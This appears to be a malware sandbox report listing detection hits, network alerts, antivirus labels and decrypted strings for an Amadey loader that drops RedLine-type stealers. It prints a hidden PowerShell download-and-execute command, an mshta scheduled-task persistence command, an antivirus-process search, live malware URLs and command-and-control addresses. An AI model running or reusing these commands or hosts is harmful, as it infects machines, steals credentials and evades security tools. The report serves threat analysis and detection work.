"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Schtasks From Env Var Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2288, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 1452, ProcessName: schtasks.exe
                                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1048, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", ProcessId: 1376, ProcessName: wscript.exe
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6616, ProcessName: svchost.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Drops script at startup location
                                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 1464, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url
                                    Sigma detected: Powershell download and execute file
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Sigma detected: Search for Antivirus process
                                    Source: Process startedAuthor: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5444, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 6096, ProcessName: findstr.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:48:15.651968+010020283713Unknown Traffic192.168.2.449852104.21.16.1443TCP
                                    2025-03-08T15:51:37.663766+010020283713Unknown Traffic192.168.2.449801188.114.97.3443TCP
                                    2025-03-08T15:51:43.536352+010020283713Unknown Traffic192.168.2.449809104.21.16.1443TCP
                                    2025-03-08T15:51:43.888449+010020283713Unknown Traffic192.168.2.449807188.114.97.3443TCP
                                    2025-03-08T15:51:47.122131+010020283713Unknown Traffic192.168.2.449814104.21.16.1443TCP
                                    2025-03-08T15:51:48.956877+010020283713Unknown Traffic192.168.2.449816104.21.16.1443TCP
                                    2025-03-08T15:51:50.163287+010020283713Unknown Traffic192.168.2.449817104.21.16.1443TCP
                                    2025-03-08T15:51:53.735882+010020283713Unknown Traffic192.168.2.449819104.21.16.1443TCP
                                    2025-03-08T15:51:57.219222+010020283713Unknown Traffic192.168.2.449822104.21.16.1443TCP
                                    2025-03-08T15:51:57.318184+010020283713Unknown Traffic192.168.2.449821104.21.16.1443TCP
                                    2025-03-08T15:52:00.280850+010020283713Unknown Traffic192.168.2.449825104.21.16.1443TCP
                                    2025-03-08T15:52:00.451335+010020283713Unknown Traffic192.168.2.449826104.21.16.1443TCP
                                    2025-03-08T15:52:03.454802+010020283713Unknown Traffic192.168.2.449828104.21.16.1443TCP
                                    2025-03-08T15:52:06.358756+010020283713Unknown Traffic192.168.2.449830104.21.16.1443TCP
                                    2025-03-08T15:52:07.661756+010020283713Unknown Traffic192.168.2.449832104.21.16.1443TCP
                                    2025-03-08T15:52:09.912463+010020283713Unknown Traffic192.168.2.449833104.21.16.1443TCP
                                    2025-03-08T15:52:13.603796+010020283713Unknown Traffic192.168.2.449836104.21.16.1443TCP
                                    2025-03-08T15:52:13.849815+010020283713Unknown Traffic192.168.2.449834188.114.97.3443TCP
                                    2025-03-08T15:52:19.215776+010020283713Unknown Traffic192.168.2.449842104.21.16.1443TCP
                                    2025-03-08T15:52:24.119091+010020283713Unknown Traffic192.168.2.449846104.21.16.1443TCP
                                    2025-03-08T15:52:27.117185+010020283713Unknown Traffic192.168.2.449850104.21.16.1443TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:52:23.945697+010020287653Unknown Traffic192.168.2.4498395.75.210.149443TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:52:29.134677+010020450001Malware Command and Control Activity Detected101.99.92.19040919192.168.2.449847TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:48:15.651968+010020460561A Network Trojan was detected101.99.92.19040919192.168.2.449847TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:48:15.651968+010020450011Malware Command and Control Activity Detected101.99.92.19040919192.168.2.449847TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:48:29.396729+010028561471A Network Trojan was detected192.168.2.449715176.113.115.680TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:52:00.653739+010028561481A Network Trojan was detected192.168.2.449824185.125.50.880TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:51:20.829634+010028033053Unknown Traffic192.168.2.449796176.113.115.780TCP
                                    2025-03-08T15:51:31.897708+010028033053Unknown Traffic192.168.2.449800176.113.115.780TCP
                                    2025-03-08T15:51:37.722400+010028033053Unknown Traffic192.168.2.449804176.113.115.780TCP
                                    2025-03-08T15:51:45.270504+010028033053Unknown Traffic192.168.2.449812176.113.115.780TCP
                                    2025-03-08T15:51:54.390797+010028033053Unknown Traffic192.168.2.449820176.113.115.780TCP
                                    2025-03-08T15:52:06.557933+010028033053Unknown Traffic192.168.2.449831176.113.115.780TCP
                                    2025-03-08T15:52:14.722306+010028033053Unknown Traffic192.168.2.449838176.113.115.780TCP
                                    2025-03-08T15:52:20.624690+010028033053Unknown Traffic192.168.2.449844176.113.115.780TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:52:24.273181+010028496621Malware Command and Control Activity Detected192.168.2.449847101.99.92.19040919TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:52:29.382644+010028493511Malware Command and Control Activity Detected192.168.2.449847101.99.92.19040919TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:51:58.548551+010028560971A Network Trojan was detected192.168.2.449824185.125.50.880TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-03-08T15:52:24.273181+010018000001Malware Command and Control Activity Detected192.168.2.449847101.99.92.19040919TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: random.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://176.113.115.7/files/5526411762/CgmaT61.exeAvira URL Cloud: Label: malware
                                    Source: https://garagedrootz.top/oPsoJANerAvira URL Cloud: Label: malware
                                    Source: http://176.113.115.7/files/5526411762/yUI6F6C.exeAvira URL Cloud: Label: malware
                                    Source: https://garagedrootz.top:443/oPsoJANAvira URL Cloud: Label: malware
                                    Source: https://garagedrootz.top/Avira URL Cloud: Label: malware
                                    Source: http://176.113.115.7/files/6691015685/V0Bt74c.exeAvira URL Cloud: Label: malware
                                    Source: http://176.113.115.7/files/6691015685/V0Bt74c.exe.Avira URL Cloud: Label: malware
                                    Source: http://176.113.115.7/files/7098980627/mAtJWNv.exeAvira URL Cloud: Label: malware
                                    Source: https://garagedrootz.top/oPsoJANXAvira URL Cloud: Label: malware
                                    Source: https://garagedrootz.top/oPsoJANAvira URL Cloud: Label: malware
                                    Source: http://176.113.115.7/files/7868598855/zY9sqWs.exeAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exeAvira: detection malicious, Label: TR/AD.RedLineSteal.wcbyn
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exeAvira: detection malicious, Label: TR/AVI.Amadey.itpsl
                                    Source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exeAvira: detection malicious, Label: TR/AD.Nekark.ccjuh
                                    Source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exeAvira: detection malicious, Label: TR/AVI.Amadey.itpsl
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exeAvira: detection malicious, Label: TR/AD.Nekark.ccjuh
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeAvira: detection malicious, Label: TR/AD.Nekark.qnifa
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                    Source: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                    Source: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\V0Bt74c[1].exeAvira: detection malicious, Label: TR/AD.Nekark.qnifa
                                    Found malware configuration
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exeReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\V0Bt74c[1].exeReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ADFoyxP[1].exeReversingLabs: Detection: 29%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ReK7Ewx[1].exeReversingLabs: Detection: 15%
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeReversingLabs: Detection: 15%
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeReversingLabs: Detection: 60%
                                    Source: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exeReversingLabs: Detection: 29%
                                    Source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exeReversingLabs: Detection: 87%
                                    Source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exeReversingLabs: Detection: 95%
                                    Source: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeReversingLabs: Detection: 60%
                                    Multi AV Scanner detection for submitted file
                                    Source: random.exeVirustotal: Detection: 48%Perma Link
                                    Source: random.exeReversingLabs: Detection: 47%
                                    Joe Sandbox ML detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Sample uses string decryption to hide its real strings
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 176.113.115.6
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: /Ni9kiput/index.php
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: S-%lu-
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: bb556cff4a
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: rapes.exe
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Startup
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: cmd /C RMDIR /s/q
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: rundll32
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Programs
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: %USERPROFILE%
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: cred.dll|clip.dll|
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: cred.dll
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: clip.dll
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: http://
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: https://
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: /quiet
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: /Plugins/
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: &unit=
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: shell32.dll
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: kernel32.dll
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: GetNativeSystemInfo
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: ProgramData\
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: AVAST Software
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Kaspersky Lab
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Panda Security
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Doctor Web
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 360TotalSecurity
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Bitdefender
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Norton
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Sophos
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Comodo
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: WinDefender
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 0123456789
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: ------
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: ?scr=1
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: ComputerName
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: -unicode-
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: VideoID
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: DefaultSettings.XResolution
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: DefaultSettings.YResolution
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: ProductName
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: CurrentBuild
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: rundll32.exe
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: "taskkill /f /im "
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: " && timeout 1 && del
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: && Exit"
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: " && ren
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Powershell.exe
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: -executionpolicy remotesigned -File "
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: shutdown -s -t 0
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: random
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: Keyboard Layout\Preload
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 00000419
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 00000422
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 00000423
                                    Source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmpString decryptor: 0000043f
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: arisechairedd.shop/JnsHY
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: begindecafer.world/QwdZdf
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: garagedrootz.top/oPsoJAN
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: modelshiverd.icu/bJhnsj
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: catterjur.run/boSnzhu
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: orangemyther.live/IozZ
                                    Source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmpString decryptor: fostinjec.today/LksNAz

                                    Phishing

                                    barindex
                                    Yara detected obfuscated html page
